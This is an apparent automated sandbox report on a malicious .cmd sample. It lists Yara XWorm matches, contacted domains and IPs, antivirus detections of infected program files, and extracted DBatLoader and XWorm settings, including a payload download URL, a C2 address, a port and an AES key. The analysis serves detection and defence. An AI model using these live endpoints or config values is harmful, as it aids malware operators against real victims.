Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e610000.1102.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1055.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd45570.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1149.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e750000.1111.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.904.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e5570.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e610000.1103.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.915.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.27a02b90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.wdmvmswJ.pif.244ea0a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1053.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265becae.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1115.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.941.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.927.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1066.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1064.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1058.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.914.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1093.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.848.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.1060.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.919.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6d0000.1068.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.wdmvmswJ.pif.1c684410.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.865.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1160.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.845.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8fecae.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.29240000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1062.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.846.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1067.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1092.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1161.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1155.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.853.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.849.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1099.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.925.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e6478.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.29240000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.921.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1152.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd62b90.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1100.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1061.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.851.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1148.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.27a02b90.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1097.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1162.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.928.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6b0000.1095.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.918.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.942.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1150.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.wdmvmswJ.pif.244ea0a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.917.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e5f0000.1165.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.wdmvmswJ.pif.1c684410.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1101.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1054.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6c0000.1163.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1056.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.913.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e750000.1110.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0f08.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1098.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1002.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.924.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1057.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265becae.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1159.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40f08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265bfbb6.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1065.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e610000.1096.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265bfbb6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd62b90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd45570.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.843.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.923.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.929.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1052.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6c0000.1164.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd46478.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.850.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.903.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e6478.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.847.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.920.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1063.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e5570.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.916.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1158.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.844.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.866.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.1059.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1051.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1848938336.00000000213F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1798010411.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1840076965.000000001E8BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1840971745.000000001EB40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.1766990632.000000001C684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected XWorm

Source: Yara match	File source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1782690545.0000000026A57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
62.60.190.120	unknown	Iran (ISLAMIC Republic Of)	18013	ASLINE-AS-APASLINELIMITEDHK	true
165.160.15.20	unknown	United States	19574	CSCUS	false
3.254.94.185	uaafd.biz	United States	16509	AMAZON-02US	false
3.94.10.34	ytctnunms.biz	United States	14618	AMAZON-AESUS	false
34.246.200.160	tbjrpv.biz	United States	16509	AMAZON-02US	false
172.234.222.143	fwiwk.biz	United States	20940	AKAMAI-ASN1EU	false
18.208.156.248	kcyvxytog.biz	United States	14618	AMAZON-AESUS	false
34.211.97.45	apzzls.biz	United States	16509	AMAZON-02US	false
208.100.26.245	yunalwv.biz	United States	32748	STEADFASTUS	false
35.164.78.200	sctmku.biz	United States	16509	AMAZON-02US	false
172.234.222.138	przvgke.biz	United States	20940	AKAMAI-ASN1EU	false
165.160.13.20	myups.biz	United States	19574	CSCUS	false
72.52.178.23	wxgzshna.biz	United States	32244	LIQUIDWEBUS	false
188.114.97.3	chichometextiles.com	European Union	13335	CLOUDFLARENETUS	true
44.221.84.105	bumxkqgxu.biz	United States	14618	AMAZON-AESUS	false
85.214.228.140	dlynankz.biz	Germany	6724	STRATOSTRATOAGDE	false
54.244.188.177	nlscndwp.biz	United States	16509	AMAZON-02US	true
13.251.16.150	xnxvnn.biz	United States	16509	AMAZON-02US	false
47.129.31.212	qncdaagct.biz	Canada	34533	ESAMARA-ASRU	false
18.246.231.120	ereplfx.biz	United States	16509	AMAZON-02US	true
82.112.184.197	vjaxhpbji.biz	Russian Federation	43267	FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU	true
18.141.10.107	ssbzmoy.biz	United States	16509	AMAZON-02US	true

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
uaafd.biz	3.254.94.185	true
xnxvnn.biz	13.251.16.150	true
nlscndwp.biz	54.244.188.177	true
vjaxhpbji.biz	82.112.184.197	true
ytctnunms.biz	3.94.10.34	true
qncdaagct.biz	47.129.31.212	true
ctdtgwag.biz	3.94.10.34	true
tbjrpv.biz	34.246.200.160	true
kcyvxytog.biz	18.208.156.248	true
ereplfx.biz	18.246.231.120	true
apzzls.biz	34.211.97.45	true
sxmiywsfv.biz	13.251.16.150	true
pgfsvwx.biz	18.208.156.248	true
przvgke.biz	172.234.222.138	true
ocsvqjg.biz	3.254.94.185	true
ecxbwt.biz	54.244.188.177	true
bghjpy.biz	34.211.97.45	true
damcprvgv.biz	18.208.156.248	true
gnqgo.biz	18.208.156.248	true
tltxn.biz	18.208.156.248	true
deoci.biz	18.208.156.248	true
krnsmlmvd.biz	47.129.31.212	true
uevrpr.biz	18.246.231.120	true
hagujcj.biz	18.208.156.248	true
bumxkqgxu.biz	44.221.84.105	true
yhqqc.biz	34.211.97.45	true
ltpqsnu.biz	18.208.156.248	true
sctmku.biz	35.164.78.200	true
gcedd.biz	13.251.16.150	true
wxgzshna.biz	72.52.178.23	true
oshhkdluh.biz	54.244.188.177	true
opowhhece.biz	18.208.156.248	true
pectx.biz	18.246.231.120	true
jwkoeoqns.biz	18.208.156.248	true
jpskm.biz	34.211.97.45	true
cjvgcl.biz	18.208.156.248	true
ifsaia.biz	13.251.16.150	true
rynmcq.biz	54.244.188.177	true
fjumtfnz.biz	34.211.97.45	true
dyjdrp.biz	54.244.188.177	true
ypituyqsq.biz	3.94.10.34	true
tnevuluw.biz	35.164.78.200	true
znwbniskf.biz	47.129.31.212	true
ijnmvqa.biz	35.164.78.200	true
saytjshyf.biz	44.221.84.105	true
rrqafepng.biz	47.129.31.212	true
aatcwo.biz	47.129.31.212	true
uphca.biz	44.221.84.105	true
htwqzczce.biz	172.234.222.138	true
xyrgy.biz	18.208.156.248	true
banwyw.biz	44.221.84.105	true
myups.biz	165.160.13.20	true
pwlqfu.biz	34.246.200.160	true
zyiexezl.biz	18.208.156.248	true
hlzfuyy.biz	34.211.97.45	true
ssbzmoy.biz	18.141.10.107	true
knjghuig.biz	18.141.10.107	true
yunalwv.biz	208.100.26.245	true
brsua.biz	3.254.94.185	true
mgmsclkyu.biz	34.246.200.160	true
cpclnad.biz	44.221.84.105	true
ptrim.biz	18.141.10.107	true
ihcnogskt.biz	35.164.78.200	true
qpnczch.biz	18.246.231.120	true
mnjmhp.biz	47.129.31.212	true
acwjcqqv.biz	18.141.10.107	true
zrlssa.biz	44.221.84.105	true
pywolwnvd.biz	54.244.188.177	true
mjheo.biz	44.221.84.105	true
lrxdmhrr.biz	54.244.188.177	true
vrrazpdh.biz	34.211.97.45	true
cikivjto.biz	18.246.231.120	true
fgajqjyhr.biz	34.211.97.45	true
hehckyov.biz	44.221.84.105	true
kkqypycm.biz	18.141.10.107	true
bzkysubds.biz	3.94.10.34	true
xlfhhhm.biz	47.129.31.212	true
warkcdu.biz	18.141.10.107	true
npukfztj.biz	44.221.84.105	true
dwrqljrr.biz	54.244.188.177	true
gytujflc.biz	208.100.26.245	true
gvijgjwkh.biz	3.94.10.34	true
sewlqwcd.biz	44.221.84.105	true
vnvbt.biz	18.246.231.120	true
chichometextiles.com	188.114.97.3	true
nwdnxrd.biz	54.244.188.177	true
qvuhsaqa.biz	54.244.188.177	true
iuzpxe.biz	13.251.16.150	true
nqwjmb.biz	35.164.78.200	true
wllvnzb.biz	18.141.10.107	true
kvbjaur.biz	54.244.188.177	true
napws.biz	35.164.78.200	true
cvgrf.biz	54.244.188.177	true
lpuegx.biz	82.112.184.197	true
vcddkls.biz	18.141.10.107	true
wluwplyh.biz	18.141.10.107	true
vyome.biz	18.246.231.120	true
dlynankz.biz	85.214.228.140	true
reczwga.biz	44.221.84.105	true
xccjj.biz	18.246.231.120	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://typgfhb.biz/yhjy	false
http://xlfhhhm.biz/hnpfnrirpigau	false
http://vyome.biz/qpwpqegnfgthpmmj	true
http://rynmcq.biz/dxlhs	true
http://iuzpxe.biz/bjgrt	false
http://lpuegx.biz/iiuonvofxn	true
http://myups.biz/woumhgcoto	false
http://qaynky.biz/fkcgbfiiatbbgsse	false
http://ifsaia.biz/lglryrr	false
http://htwqzczce.biz/xb	false
http://jdhhbs.biz/qpbiwob	false
http://gnqgo.biz/eccfsowypckinddi	false
http://vyome.biz/tbncyidxtibogxq	true
http://saytjshyf.biz/up	false
http://vgypotwp.biz/kkr	true
http://sxmiywsfv.biz/dona	false
http://mgmsclkyu.biz/enxhgeexxmda	false
http://ijnmvqa.biz/hpk	false
http://gcedd.biz/ectmddoihjyrxjp	false
http://tnevuluw.biz/fiarjsoopiyhm	false
http://oshhkdluh.biz/crmhxhtb	true
http://gytujflc.biz/hckdbdnsiwd	false
http://bghjpy.biz/tpnlrogxe	false
http://ecxbwt.biz/lvawmhxu	true
http://pgfsvwx.biz/mgvdqejexijygsb	false
http://lpuegx.biz/gcpevfxhbnb	true
http://zgapiej.biz/mmqkhapthxjsnh	false
http://jlqltsjvh.biz/sn	true
http://rynmcq.biz/fwiohktfcqxxnbh	true
http://ihcnogskt.biz/nroqcaxg	false
http://rffxu.biz/ojwsrlrloa	false
http://sxmiywsfv.biz/vkbkkro	false
http://wluwplyh.biz/ugrdtwtacn	true
http://kvbjaur.biz/yro	true
http://cikivjto.biz/haroldungxt	true
http://apzzls.biz/ybbogla	false
http://wxgzshna.biz/buaqnbkgjr	false
http://uaafd.biz/ki	true
http://pgfsvwx.biz/bulntsganndw	false
http://jpskm.biz/ceabvuhcchcwyyq	false
http://gvijgjwkh.biz/sbnab	false
http://oflybfv.biz/bq	false
http://sxmiywsfv.biz/jdoddcjkmiicjrmw	false
http://vyome.biz/sn	true
http://iuzpxe.biz/gblgywtx	false
http://ssbzmoy.biz/uvrr	true
http://acwjcqqv.biz/dtupajxvn	true
http://qaynky.biz/ymbuxxmr	false
http://ftxlah.biz/lj	false
http://shpwbsrw.biz/ldxvcwjydqq	false
http://giliplg.biz/q	true
http://dlynankz.biz/rifmhdkgmasf	false
http://gcedd.biz/fxyeanegauuypg	false
http://ypituyqsq.biz/vbohqiwv	false
http://fwiwk.biz/qmcamdw	false
http://gytujflc.biz/bvawourmbxmjmarr	false
http://gvijgjwkh.biz/leqj	false
http://dlynankz.biz/kfmcpedbjr	false
http://uevrpr.biz/smeisoexdoewo	true
http://vjaxhpbji.biz/qrcvkhcipj	true
http://jdhhbs.biz/nuyubw	false
http://ereplfx.biz/hkamlwlybbh	true
http://lpuegx.biz/lrywafs	true
http://qpnczch.biz/tfbvwglkixk	true
http://cvgrf.biz/uqcynitxoaix	true
http://qaynky.biz/a	false
http://warkcdu.biz/btmiljbhjx	true
https://chichometextiles.com/wp-admin/233_Jwsmvmdweya	true
http://lpuegx.biz/hbcdkqyacacfvqqp	true

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: E_dekont.cmd	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://chichometextiles.com/wp-admin/233_Jwsmvmdweya"]}
Source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["62.60.190.120"], "Port": "7923", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for domain / URL

Source: uaafd.biz	Virustotal: Detection: 12%	Perma Link
Source: xnxvnn.biz	Virustotal: Detection: 13%	Perma Link
Source: nlscndwp.biz	Virustotal: Detection: 11%	Perma Link
Source: vjaxhpbji.biz	Virustotal: Detection: 13%	Perma Link

Multi AV Scanner detection for submitted file

Source: E_dekont.cmd	ReversingLabs: Detection: 44%
Source: E_dekont.cmd	Virustotal: Detection: 46%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Joe Sandbox ML: detected
